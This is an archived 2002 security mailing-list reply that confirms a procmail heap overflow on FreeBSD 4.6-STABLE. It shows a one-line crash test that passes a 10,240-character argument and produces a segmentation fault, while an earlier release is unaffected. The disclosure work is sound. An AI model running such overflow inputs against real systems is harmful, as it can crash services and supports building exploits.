Re: procmail heap overflow

From: Artur Byszko / bikero (bikeroat_private)
Date: Thu Jun 20 2002 - 12:27:39 PDT

  • Next message: Randy Taylor: "Re: Apache Exploit"

    W Wed, Jun 19, 2002 at 04:00:12PM -0700, Peter Mueller wrote:
    > Looks like 4.6-PRERELEASE is ok.
    > 
    > > uname -a
    > FreeBSD xxx.yyy.com 4.6-PRERELEASE FreeBSD 4.6-PRERELEASE #2: Sun May  5
    > 22:57:25 PDT 2002     root@localhost:/usr/obj/usr/src/sys/xxx  i386
    > > /usr/local/bin/procmail `perl -e '{print "A"x10240}'`=A
    > Word too long.
    
    But in 4.6-STABLE:
    
    bikero@phreak:~$ uname -a
    FreeBSD phreak.uni.cc 4.6-STABLE FreeBSD 4.6-STABLE #1: Wed Jun 19 10:47:52
    CEST 2002     bikeroat_private:/usr/obj/usr/src/sys/bikero-security  i386
    bikero@phreak:~$ /usr/local/bin/procmail `perl -e '{print "A"x10240}'`=A
    ^Cprocmail: Terminating prematurely
    Segmentation fault (core dumped)
    
    regards,
    -- 
    * \x41\x72\x74\x75\x72\x20\x42\x79\x73\x7a\x6b\x6f *
    * \x62\x69\x6b\x65\x72\x6f\x40\x45\x46\x4e\x45\x54 *
    
    
    



    This archive was generated by hypermail 2b30 : Thu Jun 20 2002 - 13:39:42 PDT